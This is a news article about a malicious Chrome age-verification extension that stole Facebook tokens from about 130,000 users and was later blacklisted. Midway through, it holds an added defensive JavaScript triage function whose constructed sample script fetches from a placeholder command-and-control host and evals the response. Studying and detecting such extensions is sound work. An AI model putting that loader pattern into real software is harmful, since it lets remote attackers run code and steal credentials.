Ever wonder how your mild-mannered friend’s Facebook feed suddenly got packed with lewd clickbait? That’s the question Maxime Kjaer was determined to answer when he noticed a friend’s Facebook feed peppered with Likes for sketchy link bait such as “Basic Kissing Tips”.
“Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at the Swiss Federal Institute of Technology in Switzerland, in a blog post Monday.
What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension.
The malware-laced extension, called “Viral Content Age Verify,” allowed a third party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer describes.
Going down the rabbit hole began with clicking Like on one of his Facebook friend’s “semi-raunchy” Liked items. As soon as he did, he was asked to verify his age by installing the Viral Content Age Verify Chrome browser extension.
After agreeing to install the extension, Kjaer watched as a metadata file called manifest.json began to run through three scripts (background.js, query-string.js and install.js). The background.js and query-string.js scripts are innocuous. However, the install.js script fetches the malware payload from two hard-coded URLs. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote.
Post-script execution, the C2’s instructions were to steal access tokens (the equivalent of having your username and password) for Facebook so the malware authors can control your Facebook account. The first step for malware authors with a hijacked Facebook account was to Like a Facebook page called VVideosss.
While Kjaer said the malware functions that he documented were Facebook specific, he noted that the credential stealing function also applied to YouTube. Once credentials are collected, he observed, the malware sends back to the C2 information identifying the infected machine, what version of the age verification extension you are running and whether or not you are currently logged into Facebook.
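The combination described above (an extension allowed to read and change data on every site, plus a script that pulls its instructions from a hard-coded URL at run time) can be flagged by static triage of an unpacked extension. The following is an added example, not code from Kjaer's post or from the extension itself; the Manifest V2 layout, the sample file contents, the placeholder URL and the function name `triageExtension` are assumptions constructed for illustration.

```javascript
// Static triage for an unpacked Chrome extension (Manifest V2 layout assumed).
// Input: an object mapping file names to their text contents.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const URL_RE = /https?:\/\/[^\s"'`)]+/g;
// Sinks that turn downloaded text into running code.
const EXEC_SINKS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /executeScript\s*\(\s*[^)]*\bcode\s*:/,
  /createElement\s*\(\s*["']script["']\s*\)/,
];
const NET_CALLS = /\bXMLHttpRequest\b|\bfetch\s*\(|\$\.(get|ajax|getScript)\s*\(/;

function triageExtension(files) {
  const manifest = JSON.parse(files["manifest.json"]);
  const findings = [];
  const contentScripts = manifest.content_scripts || [];
  const perms = [...(manifest.permissions || [])];
  for (const cs of contentScripts) perms.push(...(cs.matches || []));
  const broad = perms.filter((p) => BROAD_HOSTS.has(p));
  if (broad.length) findings.push({ rule: "broad-host-access", detail: broad });
  // Every script the manifest wires in: background scripts and content scripts.
  const scripts = new Set((manifest.background && manifest.background.scripts) || []);
  for (const cs of contentScripts) (cs.js || []).forEach((s) => scripts.add(s));
  for (const name of scripts) {
    const src = files[name];
    if (src === undefined) { findings.push({ rule: "missing-script", file: name }); continue; }
    const urls = src.match(URL_RE) || [];
    const fetches = NET_CALLS.test(src);
    const executes = EXEC_SINKS.some((re) => re.test(src));
    if (urls.length && fetches && executes)
      findings.push({ rule: "remote-code-load", file: name, urls });
  }
  return findings;
}

// Constructed sample; the URL and script bodies are placeholders, not the real extension.
const SAMPLE = {
  "manifest.json": JSON.stringify({
    manifest_version: 2, name: "sample", version: "1.0",
    permissions: ["tabs", "<all_urls>"],
    background: { scripts: ["background.js", "query-string.js", "install.js"] },
  }),
  "background.js": "chrome.runtime.onInstalled.addListener(function () {});",
  "query-string.js": "function parse(q) { return q.split('&'); }",
  "install.js": "var x = new XMLHttpRequest(); x.open('GET', 'https://c2.example.invalid/instructions');" +
    " x.onload = function () { eval(x.responseText); }; x.send();",
};
console.log(JSON.stringify(triageExtension(SAMPLE), null, 2));
```

These are pattern-matching heuristics for prioritising manual review; obfuscated scripts will not match them, so a clean result is not proof that an extension is safe.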
Altogether, Kjaer said there were nine identical variations of the Viral Content Age Verify extensions on the Google Chrome Webstore with a cumulative total of 132,265 users. Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions.
“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote.
Google did not immediately respond to Threatpost’s request for comment, but the company did reply to Kjaer and confirmed it blacklisted the Age Verification extensions. Will Harris, a member of Chrome’s Security team, told Kjaer that when extensions are blacklisted they are also automatically removed from users’ computers.
Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed.
— Will Harris (@parityzero) July 18, 2016
Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security.
“The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote. “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”